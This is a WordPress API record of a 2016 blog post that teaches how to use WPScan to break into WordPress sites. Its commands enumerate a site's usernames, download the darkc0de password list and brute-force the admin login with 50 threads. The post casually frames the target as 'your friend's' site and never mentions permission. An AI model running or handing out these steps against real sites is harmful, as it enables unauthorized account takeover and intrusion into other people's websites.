{"id":405,"date":"2016-01-15T16:12:29","date_gmt":"2016-01-15T16:12:29","guid":{"rendered":"http:\/\/sushilkumar.ind.in\/?p=405"},"modified":"2016-01-15T16:15:53","modified_gmt":"2016-01-15T16:15:53","slug":"how-to-hack-wordpress-website-by-linux","status":"publish","type":"post","link":"https:\/\/www.sushilkumar.ind.in\/blog\/wordpress\/how-to-hack-wordpress-website-by-linux\/","title":{"rendered":"How to hack wordpress website by linux?"},"content":{"rendered":"<p><span color=\"#134f5c\" style=\"color: #134f5c;\"><b>WPScan.rb<\/b> is a nifty program that allows you to scan WordPress sites for information as well as do some fun stuff. Say, for example, you want to &#8220;hack&#8221; into your friend&#8217;s WordPress site :-)&#8230;or just get some information, whatever.<\/span><\/p>\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\">I&#8217;m using BackTrack 5 r3 for this tutorial, but you can use Kali Linux for this; they are similar.<\/span><\/p>\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\"><br \/>\n<\/span><span color=\"#134f5c\" style=\"color: #134f5c;\"><b>Step1: You can use it to enumerate usernames, so you can see what usernames are valid on the WordPress site by running this command:<\/b><\/span><\/p>\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\"><br \/>\n<\/span><span color=\"#ff0000\" style=\"color: #ff0000;\"><b>ruby .\/wpscan.rb --url www.friends-site.com --enumerate u<\/b><\/span><\/p>\n<p class=\"separator\"><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"410\" data-permalink=\"https:\/\/www.sushilkumar.ind.in\/blog\/wordpress\/how-to-hack-wordpress-website-by-linux\/attachment\/2-1-2\/\" data-orig-file=\"https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2-1-1.jpg\" data-orig-size=\"640,266\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"2 (1)\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2-1-1-300x125.jpg\" data-large-file=\"https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2-1-1.jpg\" tabindex=\"0\" role=\"button\" src=\"http:\/\/sushilkumar.ind.in\/wp-content\/uploads\/2016\/01\/2-1-1.jpg\" alt=\"2 (1)\" width=\"640\" height=\"266\" class=\"alignnone size-full wp-image-410\" srcset=\"https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2-1-1.jpg 640w, https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2-1-1-300x125.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" \/><\/p>\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\"><br \/>\n<\/span><span color=\"#134f5c\" style=\"color: #134f5c;\"><b>Running this command against a real WordPress site will show something like this:\u00a0<\/b><\/span><\/p>\n<p class=\"separator\">\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\"><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"408\" data-permalink=\"https:\/\/www.sushilkumar.ind.in\/blog\/wordpress\/how-to-hack-wordpress-website-by-linux\/attachment\/2\/\" data-orig-file=\"https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2.jpg\" data-orig-size=\"755,347\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"2\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2-300x138.jpg\" data-large-file=\"https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2.jpg\" tabindex=\"0\" role=\"button\" src=\"http:\/\/sushilkumar.ind.in\/wp-content\/uploads\/2016\/01\/2.jpg\" alt=\"2\" width=\"755\" height=\"347\" class=\"alignnone size-full wp-image-408\" srcset=\"https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2.jpg 755w, https:\/\/www.sushilkumar.ind.in\/blog\/wp-content\/uploads\/2016\/01\/2-300x138.jpg 300w\" sizes=\"(max-width: 755px) 100vw, 755px\" \/><br \/>\n<\/span><b><span color=\"#134f5c\" style=\"color: #134f5c;\">Step2:<\/span><\/b><\/p>\n<p><b><span color=\"#134f5c\" style=\"color: #134f5c;\">Now that you know what the usernames are, you can then try to brute force it with a list of passwords. This process takes a while, and you have to have a word list. 
BackTrack 5 r3 comes with a decent word list, so I&#8217;ll use that in this example.<\/span><\/b><\/p>\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\"><br \/>\n<\/span><b><span color=\"#ff0000\" style=\"color: #ff0000;\">ruby .\/wpscan.rb --url www.friends-site.com --wordlist \/pentest\/passwords\/wordlists\/darkc0de.lst --username admin<\/span><\/b><\/p>\n<p><b><span color=\"#ff0000\" style=\"color: #ff0000;\"><br \/>\n<\/span><\/b><span color=\"#134f5c\" style=\"color: #134f5c;\">The above command is telling WPScan to attack your friend&#8217;s URL, using the username &#8220;admin&#8221; with the word list that is located in the<\/span><b><span color=\"#ff0000\" style=\"color: #ff0000;\"> \/pentest\/passwords\/wordlists\/<\/span><\/b><span color=\"#134f5c\" style=\"color: #134f5c;\"> folder of BackTrack 5.<\/span><\/p>\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\">You can even add threading to make the process a little faster by using this switch: --threads 50<\/span><\/p>\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\">There are a few more things you can do, including scanning for which plugins the site uses and reporting which ones are vulnerable.<\/span><\/p>\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\">Happy WordPress Hacking!!<\/span><\/p>\n<p><span color=\"#134f5c\" style=\"color: #134f5c;\">or<\/span><\/p>\n<p><b><span color=\"#e43101\" size=\"4\" style=\"color: #e43101; font-size: large;\">How to Install WPScan?<\/span><\/b><\/p>\n<p>Before you install WPScan, you have to install a number of dependencies required by this tiny Ruby application. 
BTW, I am using BackTrack5 Linux.<\/p>\n<p><b>Dependencies :<\/b><\/p>\n<p><code>apt-get install libcurl4-gnutls-dev<br \/>\ngem install --user-install mime-types<br \/>\ngem install --user-install xml-simple<br \/>\ngem install --user-install typhoeus<\/code><\/p>\n<p><b>WPScan Installation :<\/b><\/p>\n<p><code>cd \/pentest\/web\/<br \/>\nwget http:\/\/wpscan.googlecode.com\/files\/wpscan-1.0.zip<br \/>\nunzip wpscan-1.0.zip<br \/>\ncd wpscan<\/code><\/p>\n<p><b><span color=\"#e43101\" size=\"4\" style=\"color: #e43101; font-size: large;\">How to use WPScan?<\/span><\/b><\/p>\n<p>We are almost done. One more thing we need here is to download the keyword database that will be used for brute forcing.<\/p>\n<p><code>wget http:\/\/static.hackersgarage.com\/darkc0de.lst.gz<br \/>\ngunzip darkc0de.lst.gz<\/code><\/p>\n<p><b>Example usage of this application :<\/b><\/p>\n<p>Do \u2018non-intrusive\u2019 checks\u2026<\/p>\n<p><code>ruby .\/wpscan.rb --url www.hackersgarage.com<\/code><\/p>\n<p>Do wordlist password brute force on enumerated users using 50 threads\u2026<\/p>\n<p><code>ruby .\/wpscan.rb --url www.hackersgarage.com --wordlist darkc0de.lst --threads 50<\/code><\/p>\n<p>Do wordlist password brute force on the \u2018admin\u2019 username only\u2026<\/p>\n<p><code>ruby .\/wpscan.rb --url www.hackersgarage.com --wordlist darkc0de.lst --username admin<\/code><\/p>\n<p>Generate a new \u2018most popular\u2019 plugin list, up to 150 pages\u2026<\/p>\n<p><code>ruby .\/wpscan.rb --generate_plugin_list 150<\/code><\/p>\n<p>Enumerate installed plugins\u2026<\/p>\n<p><code>ruby .\/wpscan.rb --enumerate p<\/code><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WPScan.rb is a nifty program that allows you to scan WordPress sites for information as well as do some fun stuff. Say, for example, you want to &#8220;hack&#8221; into your friend&#8217;s WordPress site :-)&#8230;or just get some information, whatever. 
I&#8217;m using BackTrack 5 r3 for this tutorial but you can use kali linux for &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[13],"tags":[36,38,39,37],"class_list":["post-405","post","type-post","status-publish","format-standard","","category-wordpress","tag-hack","tag-linux","tag-website","tag-wordpress"],"jetpack_publicize_connections":[],"acf":[],"aioseo_notices":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p99pkJ-6x","_links":{"self":[{"href":"https:\/\/www.sushilkumar.ind.in\/blog\/wp-json\/wp\/v2\/posts\/405"}],"collection":[{"href":"https:\/\/www.sushilkumar.ind.in\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sushilkumar.ind.in\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sushilkumar.ind.in\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sushilkumar.ind.in\/blog\/wp-json\/wp\/v2\/comments?post=405"}],"version-history":[{"count":0,"href":"https:\/\/www.sushilkumar.ind.in\/blog\/wp-json\/wp\/v2\/posts\/405\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sushilkumar.ind.in\/blog\/wp-json\/wp\/v2\/media?parent=405"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sushilkumar.ind.in\/blog\/wp-json\/wp\/v2\/categories?post=405"},{"taxonomy
":"post_tag","embeddable":true,"href":"https:\/\/www.sushilkumar.ind.in\/blog\/wp-json\/wp\/v2\/tags?post=405"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}